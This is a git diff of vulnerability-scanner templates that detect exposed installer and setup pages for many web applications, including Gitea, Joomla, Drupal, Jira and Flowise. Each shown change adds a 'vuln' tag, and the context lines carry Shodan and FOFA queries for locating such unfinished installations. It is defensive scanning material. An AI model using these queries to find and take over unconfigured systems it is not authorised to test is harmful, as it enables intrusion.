b3f3723e93d..18156d32470 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -16,7 +16,7 @@ info: vendor: cal product: cal.com fofa-query: body="Setup | Cal.com" - tags: misconfig,install,exposure,cal + tags: misconfig,install,exposure,cal,vuln http: - method: GET diff --git a/http/misconfiguration/installer/chamilo-installer.yaml b/http/misconfiguration/installer/chamilo-installer.yaml index 2befe5db5f8..a5023700afd 100644 --- a/http/misconfiguration/installer/chamilo-installer.yaml +++ b/http/misconfiguration/installer/chamilo-installer.yaml @@ -13,7 +13,7 @@ info: vendor: chamilo product: chamilo shodan-query: title:"Chamilo has not been installed" - tags: misconfig,chamilo,install,exposure + tags: misconfig,chamilo,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/circarlife-setup.yaml b/http/misconfiguration/installer/circarlife-setup.yaml index 22cd33123e7..9cbc87d1a83 100644 --- a/http/misconfiguration/installer/circarlife-setup.yaml +++ b/http/misconfiguration/installer/circarlife-setup.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"- setup" html:"Modem setup" product: circarlife vendor: circontrol - tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig + tags: scada,circontrol,circarlife,setup,exposure,panel,installer,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml index 5a0998acd6c..13dd472ab4c 100644 --- a/http/misconfiguration/installer/clipbucket-installer.yaml +++ b/http/misconfiguration/installer/clipbucket-installer.yaml @@ -14,7 +14,7 @@ info: product: clipbucket shodan-query: http.favicon.hash:538583492 fofa-query: icon_hash="538583492" - tags: misconfig,clipbucket,install,exposure + tags: misconfig,clipbucket,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/cloudcenter-installer.yaml b/http/misconfiguration/installer/cloudcenter-installer.yaml index cd8d0004e33..e1e5f4c2f89 100644 --- a/http/misconfiguration/installer/cloudcenter-installer.yaml +++ b/http/misconfiguration/installer/cloudcenter-installer.yaml @@ -13,7 +13,7 @@ info: vendor: cisco product: cloudcenter shodan-query: title:"CloudCenter Installer" - tags: misconfig,cisco,cloudcenter,install,exposure + tags: misconfig,cisco,cloudcenter,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/cms-made-simple-installer.yaml b/http/misconfiguration/installer/cms-made-simple-installer.yaml index d60e9b6e5d1..c4787b4609a 100644 --- a/http/misconfiguration/installer/cms-made-simple-installer.yaml +++ b/http/misconfiguration/installer/cms-made-simple-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"CMS Made Simple Install/Upgrade" - tags: misconfig,install,exposure,cms-made-simple + tags: misconfig,install,exposure,cms-made-simple,vuln http: - method: GET diff --git a/http/misconfiguration/installer/codeigniter-installer.yaml b/http/misconfiguration/installer/codeigniter-installer.yaml index 86dec1adeec..df3c09be985 100644 --- a/http/misconfiguration/installer/codeigniter-installer.yaml +++ b/http/misconfiguration/installer/codeigniter-installer.yaml @@ -13,7 +13,7 @@ info: vendor: codeigniter product: codeigniter shodan-query: http.title:"Codeigniter Application Installer" - tags: misconfig,codeigniter,install,exposure + tags: misconfig,codeigniter,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/combodo-itop-installer.yaml b/http/misconfiguration/installer/combodo-itop-installer.yaml index 77a2d0638c4..a6b04ca85e4 100644 --- a/http/misconfiguration/installer/combodo-itop-installer.yaml +++ b/http/misconfiguration/installer/combodo-itop-installer.yaml @@ -15,7 +15,7 @@ info: vendor: combodo product: itop shodan-query: html:"Installation" html:"itop" - tags: misconfig,itop,install,exposure + tags: misconfig,itop,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/concrete-installer.yaml b/http/misconfiguration/installer/concrete-installer.yaml index db3edebfa70..b05c5f6c7d5 100644 --- a/http/misconfiguration/installer/concrete-installer.yaml +++ b/http/misconfiguration/installer/concrete-installer.yaml @@ -13,7 +13,7 @@ info: vendor: concretecms product: concrete_cms shodan-query: title:"Install concrete" - tags: misconfig,exposure,install,concrete + tags: misconfig,exposure,install,concrete,vuln http: - method: GET diff --git a/http/misconfiguration/installer/confluence-installer.yaml b/http/misconfiguration/installer/confluence-installer.yaml index b1413aa9b69..05238b25368 100644 --- a/http/misconfiguration/installer/confluence-installer.yaml +++ b/http/misconfiguration/installer/confluence-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Choose your deployment type - Confluence" - tags: misconfig,exposure,install,confluence + tags: misconfig,exposure,install,confluence,vuln http: - method: GET diff --git a/http/misconfiguration/installer/connectwise-setup.yaml b/http/misconfiguration/installer/connectwise-setup.yaml index 5bf885eaaf0..e37a66e571c 100644 --- a/http/misconfiguration/installer/connectwise-setup.yaml +++ b/http/misconfiguration/installer/connectwise-setup.yaml @@ -12,7 +12,7 @@ info: vendor: connectwise product: control shodan-query: html:"ContentPanel SetupWizard" - tags: misconfig,exposure,install,connectwise + tags: misconfig,exposure,install,connectwise,vuln http: - method: GET diff --git a/http/misconfiguration/installer/contentify-installer.yaml b/http/misconfiguration/installer/contentify-installer.yaml index e36836f82c1..1aed348157f 100644 --- a/http/misconfiguration/installer/contentify-installer.yaml +++ b/http/misconfiguration/installer/contentify-installer.yaml @@ -8,7 +8,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,contentify,install,exposure + tags: misconfig,contentify,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/cube-105-install.yaml b/http/misconfiguration/installer/cube-105-install.yaml index 6bcfceb9eb9..89feae4d6c4 100644 --- a/http/misconfiguration/installer/cube-105-install.yaml +++ b/http/misconfiguration/installer/cube-105-install.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 fofa-query: title="Cube-105 Setup Wizard" - tags: misconfig,cube,cube105,install + tags: misconfig,cube,cube105,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/cubebackup-setup-installer.yaml b/http/misconfiguration/installer/cubebackup-setup-installer.yaml index 200f408fd0a..2e9729c2a68 100644 --- a/http/misconfiguration/installer/cubebackup-setup-installer.yaml +++ b/http/misconfiguration/installer/cubebackup-setup-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body="CubeBackup setup" - tags: misconfig,install,exposure,cubebackup + tags: misconfig,install,exposure,cubebackup,vuln http: - method: GET diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml index bfb08a7606d..be44d401739 100644 --- a/http/misconfiguration/installer/custom-xoops-installer.yaml +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -16,7 +16,7 @@ info: vendor: xoops product: xoops fofa-query: title="XOOPS Custom Installation" - tags: misconfig,xoops,installer + tags: misconfig,xoops,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/discourse-installer.yaml b/http/misconfiguration/installer/discourse-installer.yaml index 53840c63434..686d07bb5b6 100644 --- a/http/misconfiguration/installer/discourse-installer.yaml +++ b/http/misconfiguration/installer/discourse-installer.yaml @@ -13,7 +13,7 @@ info: vendor: discourse product: discourse shodan-query: title:"Discourse Setup" - tags: misconfig,discourse,install + tags: misconfig,discourse,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/dokploy-installer.yaml b/http/misconfiguration/installer/dokploy-installer.yaml index a84a484241e..114133520bf 100644 --- a/http/misconfiguration/installer/dokploy-installer.yaml +++ b/http/misconfiguration/installer/dokploy-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="Dokploy" && body="setup the server" - tags: misconfig,dokploy,install,exposure + tags: misconfig,dokploy,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/dokuwiki-installer.yaml b/http/misconfiguration/installer/dokuwiki-installer.yaml index f338b299914..c1da7d4e652 100644 --- a/http/misconfiguration/installer/dokuwiki-installer.yaml +++ b/http/misconfiguration/installer/dokuwiki-installer.yaml @@ -13,7 +13,7 @@ info: vendor: dokuwiki product: dokuwiki shodan-query: title:"DokuWiki" - tags: misconfig,dokuwiki,install,exposure + tags: misconfig,dokuwiki,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/dolibarr-installer.yaml b/http/misconfiguration/installer/dolibarr-installer.yaml index 931f7594d5c..d6725247325 100644 --- a/http/misconfiguration/installer/dolibarr-installer.yaml +++ b/http/misconfiguration/installer/dolibarr-installer.yaml @@ -13,7 +13,7 @@ info: vendor: dolibarr product: dolibarr_erp\\/crm shodan-query: title:"Dolibarr install or upgrade" - tags: misconfig,exposure,install + tags: misconfig,exposure,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/dolphin-installer.yaml b/http/misconfiguration/installer/dolphin-installer.yaml index b4bd08fe242..0d51ab8a1d8 100644 --- a/http/misconfiguration/installer/dolphin-installer.yaml +++ b/http/misconfiguration/installer/dolphin-installer.yaml @@ -13,7 +13,7 @@ info: vendor: boonex product: dolphin fofa-query: icon_hash="-945121295" - tags: misconfig,dolphin,install,exposure + tags: misconfig,dolphin,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 1222c9a9943..f2dce041e91 100644 --- a/http/misconfiguration/installer/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -12,7 +12,7 @@ info: - cpe:"cpe:2.3:a:drupal:drupal" product: drupal vendor: drupal - tags: misconfig,drupal,install,exposure + tags: misconfig,drupal,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/easy-viserlabs-installer.yaml b/http/misconfiguration/installer/easy-viserlabs-installer.yaml index 805b3a37078..bb4278e47e1 100644 --- a/http/misconfiguration/installer/easy-viserlabs-installer.yaml +++ b/http/misconfiguration/installer/easy-viserlabs-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Easy Installer by ViserLab" - tags: install,easy,exposure,misconfig + tags: install,easy,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/easy-wi-installer.yaml b/http/misconfiguration/installer/easy-wi-installer.yaml index bc11e5ffda1..4452d7844fc 100644 --- a/http/misconfiguration/installer/easy-wi-installer.yaml +++ b/http/misconfiguration/installer/easy-wi-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="Easy-WI Installer" - tags: misconfig,exposure,install,easy-wi + tags: misconfig,exposure,install,easy-wi,vuln http: - method: GET diff --git a/http/misconfiguration/installer/easyscripts-installer.yaml b/http/misconfiguration/installer/easyscripts-installer.yaml index 614c1d772a6..e034f527013 100644 --- a/http/misconfiguration/installer/easyscripts-installer.yaml +++ b/http/misconfiguration/installer/easyscripts-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Installer - Easyscripts" - tags: misconfig,easyscripts,installer + tags: misconfig,easyscripts,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml index 0b8da0b0570..7f49b2a4cc6 100644 --- a/http/misconfiguration/installer/ejbca-enterprise-installer.yaml +++ b/http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -16,7 +16,7 @@ info: vendor: primekey product: ejbca shodan-query: html:"EJBCA Enterprise Cloud Configuration Wizard" - tags: misconfig,install,exposure,ejbca + tags: misconfig,install,exposure,ejbca,vuln http: - method: GET diff --git a/http/misconfiguration/installer/elgg-install.yaml b/http/misconfiguration/installer/elgg-install.yaml index 94fd30a1cc6..95510daf262 100644 --- a/http/misconfiguration/installer/elgg-install.yaml +++ b/http/misconfiguration/installer/elgg-install.yaml @@ -15,7 +15,7 @@ info: vendor: elgg product: elgg fofa-query: title="Welcome to Elgg" - tags: install,elgg,exposure,misconfig + tags: install,elgg,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/emby-installer.yaml b/http/misconfiguration/installer/emby-installer.yaml index 1f5e71a0d0b..bee46faab41 100644 --- a/http/misconfiguration/installer/emby-installer.yaml +++ b/http/misconfiguration/installer/emby-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="Emby" && body="wizard" && icon_hash="1399717985" - tags: install,emby,misconfig + tags: install,emby,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/emlog-installer.yaml b/http/misconfiguration/installer/emlog-installer.yaml index f8fc0b106e3..ad852863d71 100644 --- a/http/misconfiguration/installer/emlog-installer.yaml +++ b/http/misconfiguration/installer/emlog-installer.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true fofa-query: title="emlog" - tags: emlog,install,misconfig + tags: emlog,install,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/eshop-installer.yaml b/http/misconfiguration/installer/eshop-installer.yaml index fae0711f02d..830ceb271ba 100644 --- a/http/misconfiguration/installer/eshop-installer.yaml +++ b/http/misconfiguration/installer/eshop-installer.yaml @@ -13,7 +13,7 @@ info: vendor: oxid-esales product: eshop shodan-query: html:"eShop Installer" - tags: misconfig,eshop,install,exposure + tags: misconfig,eshop,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/espeasy-installer.yaml b/http/misconfiguration/installer/espeasy-installer.yaml index 7da0ac3fa84..a1847ad3f6e 100644 --- a/http/misconfiguration/installer/espeasy-installer.yaml +++ b/http/misconfiguration/installer/espeasy-installer.yaml @@ -8,7 +8,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,espeasy,install,exposure + tags: misconfig,espeasy,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/espocrm-installer.yaml b/http/misconfiguration/installer/espocrm-installer.yaml index 60a20d5a365..4eec02fb613 100644 --- a/http/misconfiguration/installer/espocrm-installer.yaml +++ b/http/misconfiguration/installer/espocrm-installer.yaml @@ -13,7 +13,7 @@ info: vendor: espocrm product: espocrm shodan-query: html:"Welcome to Espocrm" - tags: misconfig,espocrm,install,exposure + tags: misconfig,espocrm,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/eyoucms-installer.yaml b/http/misconfiguration/installer/eyoucms-installer.yaml index d30c11b888a..9f808fde21d 100644 --- a/http/misconfiguration/installer/eyoucms-installer.yaml +++ b/http/misconfiguration/installer/eyoucms-installer.yaml @@ -11,7 +11,7 @@ info: fofa-query: title="eyoucms" product: eyoucms vendor: eyoucms - tags: misconfig,eyoucms,install + tags: misconfig,eyoucms,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/facturascripts-installer.yaml b/http/misconfiguration/installer/facturascripts-installer.yaml index 49a9d02a0c4..6a5c3418579 100644 --- a/http/misconfiguration/installer/facturascripts-installer.yaml +++ b/http/misconfiguration/installer/facturascripts-installer.yaml @@ -13,7 +13,7 @@ info: vendor: facturascripts product: facturascripts shodan-query: html:"FacturaScripts installer" - tags: misconfig,facturascripts,install,exposure + tags: misconfig,facturascripts,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml index 5779773e4aa..dfa661810ab 100644 --- a/http/misconfiguration/installer/flarum-installer.yaml +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -16,7 +16,7 @@ info: vendor: flarum product: flarum shodan-query: html:"Install Flarum" - tags: misconfig,install,exposure,flarum + tags: misconfig,install,exposure,flarum,vuln http: - method: GET diff --git a/http/misconfiguration/installer/fleetcart-installer.yaml b/http/misconfiguration/installer/fleetcart-installer.yaml index 6f66be032ea..a89a14384cf 100644 --- a/http/misconfiguration/installer/fleetcart-installer.yaml +++ b/http/misconfiguration/installer/fleetcart-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"FleetCart - Installation" - tags: misconfig,install,exposure,fleetcart + tags: misconfig,install,exposure,fleetcart,vuln http: - method: GET diff --git a/http/misconfiguration/installer/flowise-installer.yaml b/http/misconfiguration/installer/flowise-installer.yaml index 1dae564809e..141397a28a0 100644 --- a/http/misconfiguration/installer/flowise-installer.yaml +++ b/http/misconfiguration/installer/flowise-installer.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: http.title:"Flowise - Build AI Agents, Visually" - tags: misconfig,exposure,install,flowise,intrusive + tags: misconfig,exposure,install,flowise,intrusive,vuln variables: name: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/misconfiguration/installer/forgejo-installer.yaml b/http/misconfiguration/installer/forgejo-installer.yaml index fefa5da7ff6..f5edd8f40fc 100644 --- a/http/misconfiguration/installer/forgejo-installer.yaml +++ b/http/misconfiguration/installer/forgejo-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="Installation - Forgejo:" - tags: install,Forgejo,misconfig + tags: install,Forgejo,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/fossbilling-installer.yaml b/http/misconfiguration/installer/fossbilling-installer.yaml index 5dd87c1abc0..775ef4e0d49 100644 --- a/http/misconfiguration/installer/fossbilling-installer.yaml +++ b/http/misconfiguration/installer/fossbilling-installer.yaml @@ -14,7 +14,7 @@ info: vendor: fossbilling product: fossbilling shodan-query: title:"FOSSBilling" - tags: fossbilling,install,misconfig + tags: fossbilling,install,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/freshrss-installer.yaml b/http/misconfiguration/installer/freshrss-installer.yaml index 30e6a007ba2..cf936f6e122 100644 --- a/http/misconfiguration/installer/freshrss-installer.yaml +++ b/http/misconfiguration/installer/freshrss-installer.yaml @@ -14,7 +14,7 @@ info: vendor: freshrss product: freshrss fofa-query: title="Installation · FreshRSS" - tags: freshrss,misconfig,install + tags: freshrss,misconfig,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml index b1e871a1a4e..8f15a1e33c6 100644 --- a/http/misconfiguration/installer/froxlor-installer.yaml +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -16,7 +16,7 @@ info: vendor: froxlor product: froxlor fofa-query: title="Froxlor Server Management Panel - Installation" - tags: misconfig,froxlor,installer + tags: misconfig,froxlor,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/geniusocean-installer.yaml b/http/misconfiguration/installer/geniusocean-installer.yaml index 52a197f7e46..ccf4f44de24 100644 --- a/http/misconfiguration/installer/geniusocean-installer.yaml +++ b/http/misconfiguration/installer/geniusocean-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"GeniusOcean Installer" - tags: misconfig,geniusocean,install,exposure + tags: misconfig,geniusocean,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/getsimple-installation.yaml b/http/misconfiguration/installer/getsimple-installation.yaml index c591cc184ba..0f3fe73fc92 100644 --- a/http/misconfiguration/installer/getsimple-installation.yaml +++ b/http/misconfiguration/installer/getsimple-installation.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-284 metadata: max-request: 1 - tags: getsimple,exposure,installer,misconfig + tags: getsimple,exposure,installer,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/gibbon-installer.yaml b/http/misconfiguration/installer/gibbon-installer.yaml index c7e53a2ae26..8ae74f320ff 100644 --- a/http/misconfiguration/installer/gibbon-installer.yaml +++ b/http/misconfiguration/installer/gibbon-installer.yaml @@ -12,7 +12,7 @@ info: product: gibbon vendor: gibbonedu shodan-query: http.favicon.hash:"-165631681" - tags: misconfig,gibbon,install,exposure + tags: misconfig,gibbon,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/gitea-installer.yaml b/http/misconfiguration/installer/gitea-installer.yaml index 891f9fbc106..fb2c4bc754b 100644 --- a/http/misconfiguration/installer/gitea-installer.yaml +++ b/http/misconfiguration/installer/gitea-installer.yaml @@ -13,7 +13,7 @@ info: vendor: gitea product: gitea shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"' - tags: misconfig,gitea,install + tags: misconfig,gitea,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/glpi-installer.yaml b/http/misconfiguration/installer/glpi-installer.yaml index 931e830ded5..4491e08a6d7 100644 --- a/http/misconfiguration/installer/glpi-installer.yaml +++ b/http/misconfiguration/installer/glpi-installer.yaml @@ -16,7 +16,7 @@ info: vendor: glpi-project product: glpi shodan-query: html:"Setup GLPI" - tags: misconfig,install,exposure,glpi + tags: misconfig,install,exposure,glpi,vuln http: - method: GET diff --git a/http/misconfiguration/installer/gogs-installer.yaml b/http/misconfiguration/installer/gogs-installer.yaml index bbb44f23467..0dc792ba115 100644 --- a/http/misconfiguration/installer/gogs-installer.yaml +++ b/http/misconfiguration/installer/gogs-installer.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Installation - Gogs" product: gogs vendor: gogs - tags: misconfig,exposure,gogs,install + tags: misconfig,exposure,gogs,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/growi-installer.yaml b/http/misconfiguration/installer/growi-installer.yaml index f8e5d0f46e5..3e452b16435 100644 --- a/http/misconfiguration/installer/growi-installer.yaml +++ b/http/misconfiguration/installer/growi-installer.yaml @@ -14,7 +14,7 @@ info: vendor: weseek product: growi shodan-query: html:"Installer - GROWI" - tags: install,growi,exposure,misconfig + tags: install,growi,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ibarn-installer.yaml b/http/misconfiguration/installer/ibarn-installer.yaml index bfd9f2bbf54..d70974e37dc 100644 --- a/http/misconfiguration/installer/ibarn-installer.yaml +++ b/http/misconfiguration/installer/ibarn-installer.yaml @@ -12,7 +12,7 @@ info: product: ibarn shodan-query: title:"iBarn" fofa-query: title="iBarn" - tags: ibarn,installer,exposure,misconfig + tags: ibarn,installer,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ictbroadcast-installer.yaml b/http/misconfiguration/installer/ictbroadcast-installer.yaml index 710be20a889..48f08f396bd 100644 --- a/http/misconfiguration/installer/ictbroadcast-installer.yaml +++ b/http/misconfiguration/installer/ictbroadcast-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"ICTBroadcast" - tags: misconfig,exposure,install,ictbroadcast + tags: misconfig,exposure,install,ictbroadcast,vuln http: - method: GET diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml index ac0148f238e..0c83050dc80 100644 --- a/http/misconfiguration/installer/ids-skills-installer.yaml +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"IDP Skills Installer" - tags: install,ids,exposure,misconfig + tags: install,ids,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/impresspages-installer.yaml b/http/misconfiguration/installer/impresspages-installer.yaml index 89cb40aba3b..27cac999585 100644 --- a/http/misconfiguration/installer/impresspages-installer.yaml +++ b/http/misconfiguration/installer/impresspages-installer.yaml @@ -13,7 +13,7 @@ info: vendor: impresspages product: impresspages_cms shodan-query: http.title:"ImpressPages installation wizard" - tags: misconfig,exposure,install,impresspages + tags: misconfig,exposure,install,impresspages,vuln http: - method: GET diff --git a/http/misconfiguration/installer/imprivata-installer.yaml b/http/misconfiguration/installer/imprivata-installer.yaml index 681dc44c458..0d277979c67 100644 --- a/http/misconfiguration/installer/imprivata-installer.yaml +++ b/http/misconfiguration/installer/imprivata-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Appliance Setup Wizard" - tags: misconfig,imprivata,install,exposure + tags: misconfig,imprivata,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/indegy-sensor-installer.yaml b/http/misconfiguration/installer/indegy-sensor-installer.yaml index f7c58d5369e..5b2d4d8e294 100644 --- a/http/misconfiguration/installer/indegy-sensor-installer.yaml +++ b/http/misconfiguration/installer/indegy-sensor-installer.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Setup Wizard" http.favicon.hash:-1851491385 - tags: misconfig,indegy,sensor,installer + tags: misconfig,indegy,sensor,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/invicti-enterprise-installer.yaml b/http/misconfiguration/installer/invicti-enterprise-installer.yaml index 372d5772a98..03ab1fcd7da 100644 --- a/http/misconfiguration/installer/invicti-enterprise-installer.yaml +++ b/http/misconfiguration/installer/invicti-enterprise-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Invicti Enterprise - Installation Wizard" - tags: misconfig,install,exposure,invicti + tags: misconfig,install,exposure,invicti,vuln http: - method: GET diff --git a/http/misconfiguration/installer/invoice-ninja-installer.yaml b/http/misconfiguration/installer/invoice-ninja-installer.yaml index 1c9703bd11b..8534b40e6b2 100644 --- a/http/misconfiguration/installer/invoice-ninja-installer.yaml +++ b/http/misconfiguration/installer/invoice-ninja-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Invoice Ninja Setup" - tags: misconfig,install,exposure,invoice + tags: misconfig,install,exposure,invoice,vuln http: - method: GET diff --git a/http/misconfiguration/installer/jackett-installer.yaml b/http/misconfiguration/installer/jackett-installer.yaml index 1b00f96c0ff..2dd3b852853 100644 --- a/http/misconfiguration/installer/jackett-installer.yaml +++ b/http/misconfiguration/installer/jackett-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Stremio-Jackett" - tags: install,jackett,misconfig + tags: install,jackett,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/installer/jfa-go-installer.yaml b/http/misconfiguration/installer/jfa-go-installer.yaml index d98cde31a38..69469d78a9f 100644 --- a/http/misconfiguration/installer/jfa-go-installer.yaml +++ b/http/misconfiguration/installer/jfa-go-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Setup - jfa-go" - tags: misconfig,install,exposure,jfa-go + tags: misconfig,install,exposure,jfa-go,vuln http: - method: GET diff --git a/http/misconfiguration/installer/jira-setup.yaml b/http/misconfiguration/installer/jira-setup.yaml index e0167a5458c..69dad9173b9 100644 --- a/http/misconfiguration/installer/jira-setup.yaml +++ b/http/misconfiguration/installer/jira-setup.yaml @@ -13,7 +13,7 @@ info: vendor: atlassian product: jira shodan-query: title:"JIRA - JIRA setup" - tags: misconfig,jira,atlassian,installer + tags: misconfig,jira,atlassian,installer,vuln http: - method: GET diff --git a/http/misconfiguration/installer/joomla-installer.yaml b/http/misconfiguration/installer/joomla-installer.yaml index 753419ff53a..1fbf7fce6e9 100644 --- a/http/misconfiguration/installer/joomla-installer.yaml +++ b/http/misconfiguration/installer/joomla-installer.yaml @@ -13,7 +13,7 @@ info: vendor: joomla product: joomla\\! shodan-query: title:"Joomla Web Installer" - tags: misconfig,joomla,install + tags: misconfig,joomla,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/justfans-installer.yaml b/http/misconfiguration/installer/justfans-installer.yaml index aa992956184..03473e2e42f 100644 --- a/http/misconfiguration/installer/justfans-installer.yaml +++ b/http/misconfiguration/installer/justfans-installer.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"Install the script - JustFans" - tags: misconfig,install,exposure,justfans + tags: misconfig,install,exposure,justfans,vuln http: - method: GET diff --git a/http/misconfiguration/installer/kace-sma-installer.yaml b/http/misconfiguration/installer/kace-sma-installer.yaml index af8fb7f6e2f..259f07decb0 100644 --- a/http/misconfiguration/installer/kace-sma-installer.yaml +++ b/http/misconfiguration/installer/kace-sma-installer.yaml @@ -12,7 +12,7 @@ info: vendor: quest product: kace_systems_management_appliance fofa-query: icon_hash="-463230636" && body="setup" - tags: kace,sma,installer,exposure,quest + tags: kace,sma,installer,exposure,quest,vuln http: - method: GET diff --git a/http/misconfiguration/installer/klr300n-installer.yaml b/http/misconfiguration/installer/klr300n-installer.yaml index 73c5711152c..65b486f10f2 100644 --- a/http/misconfiguration/installer/klr300n-installer.yaml +++ b/http/misconfiguration/installer/klr300n-installer.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"def_wirelesspassword" - tags: keo,klr300n,misconfig,exposure,iot,install + tags: keo,klr300n,misconfig,exposure,iot,install,vuln http: - method: GET diff --git a/http/misconfiguration/installer/knowledgetree-installer.yaml b/http/misconfiguration/installer/knowledgetree-installer.yaml index cfc12f304d9..6c801a42f56 100644 --- a/http/misconfiguration/installer/knowledgetree-installer.yaml +++ b/http/misconfiguration/installer/knowledgetree-installer.yaml @@ -13,7 +13,7 @@ info: vendor: knowledgetree product: knowledgetree shodan-query: title:"KnowledgeTree Installer" - tags: misconfig,knowledgetree,install,exposure + tags: misconfig,knowledgetree,install,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/installer/kodbox-installer.yaml b/http/misconfiguration/installer/kodbox-installer.yaml index abef9b65790..37428b74c7f 100644 --- a/http/misconfiguration/installer/kodbox-installer.yaml +++ b/http/misconfiguration/installer/kodbox-installer.yaml @@ -14,7 +14,7 @@ info: vendor: kodcloud product: kodbox fofa-query: title="kodbox" && body="install" - tags: misconfig,exposure,install,kodbox + tags: misconfig,exposure,install,kodbox,vuln http: - method: GET diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml index 6419bc921a8..1c4b90433a2 100644 --- a/http/misconfiguration/installer/librenms-installer.yaml +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -16,7 +16,7 @@ info: vendor: librenms product: librenms shodan-query: html:"LibreNMS Install" - tags: misconfig,install,exposure,librenms + tags: misconfig,install,exposure,librenms,vuln http: - method: GET diff --git 